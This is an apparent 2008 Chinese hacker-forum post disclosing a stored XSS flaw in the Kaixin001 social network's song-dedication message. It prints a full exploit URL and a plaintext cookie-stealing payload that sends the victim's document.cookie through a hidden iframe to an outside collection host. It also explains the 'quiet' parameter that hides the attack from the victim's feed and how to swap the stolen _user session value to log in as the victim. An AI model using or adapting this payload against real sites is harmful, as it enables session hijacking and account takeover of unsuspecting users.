2008.9.25,我公布"國內(nèi)郵箱系統(tǒng)爆發(fā)大規(guī)?缯韭┒"后,F(xiàn)ireF0X就和我說,什么時候弄個XSS的主題寫寫,讓大家也一起討論一下。說來慚愧,也一直沒寫什么東西,這次在"火狐"公布"Kaixin001.comXSS漏洞",也算是給他有個交代吧。
開心網(wǎng)是一個在線社區(qū),通過它您可以與朋友、同學、同事、
家人保持更緊密的聯(lián)系,及時了解他們的動態(tài);
與他們分享你的照片、心情、快樂。
漏洞描述:開心網(wǎng)(www.kaixin001.com),
當你在給好友點歌時,你可以留言,
而開心對用戶留言的數(shù)據(jù)沒有進行嚴格過濾,
導致攻擊者可以提交惡意代碼,進行跨站攻擊。
攻擊者利用該漏洞可以盜取開心網(wǎng)用戶的cookie,
然后利用Cookie欺騙冒充該用戶進行賬號登錄。危害嚴重。
代碼利用:http://www.kaixin001.com/
music/ordermusic.php?verify=××
××_1006_××××_1228989163_×××××&
musicid=32331139&musichost=×××
××&mid=924962&orderuids=×××××&
word=%3Cimg+src%3D%22x%22+
onerror%3D%22document.write%
28%27%3Ciframe+src%3Dhttp%3A%
2F%2Fwww.×××××.com%2Fxss%
2Fxsscu.asp%3F%27%2Bescape%
28document.cookie%29%2B%27+
width%3D0++height%3D0++border%
3D0%3E%3C%2Fiframe%3E%27%29%
22%3E%0D%0A&group=&quiet=1
verify參數(shù)作用是驗證用戶身份
musicid參數(shù)是給好友點播歌曲的ID號
musichost是自己的開心網(wǎng)ID
orderuids是好友開心網(wǎng)ID
word是點歌時留言內(nèi)容
group 用戶組
quiet 悄悄地(將不會出現(xiàn)在好友的動態(tài)中)
word參數(shù)后可以加入精心構(gòu)造的跨站代碼。
盜取Cookie提交代碼:<img src="x" onerror="document.write('<
iframesrc=http://www.×××.com/xss/
xsscu.asp?'+escape(document.
cookie)+' width=0 height=0 border=0></iframe>')">
這段明文盜取COOKIE代碼,你要轉(zhuǎn)化為URL編碼后再提交。
當點歌成功后,惡意代碼將以系統(tǒng)消息的形式,發(fā)送給受害者。
系統(tǒng)會告訴受害者,你的朋友×××給你點了一首歌。
開心網(wǎng)的COOKIE(其實是Session)格式如下:
SERVERID=_srv102-125_;
_user=
3b45065b00978846edecd20e6dae77
10_×××××_1226381918;
_email=×××××%40126.com; _invisible=0。
你只要把_user中的參數(shù)替換掉,
就可以利用受害者的帳號進行登錄了。
附圖一張:用SESSIONIE,來收取開心COOKIE。
PS:敏感數(shù)據(jù)我用××××代替了,這個漏洞是首發(fā),
希望大家不要拿它做什么壞事哦,希望大家多多交流,
火狐越來越好。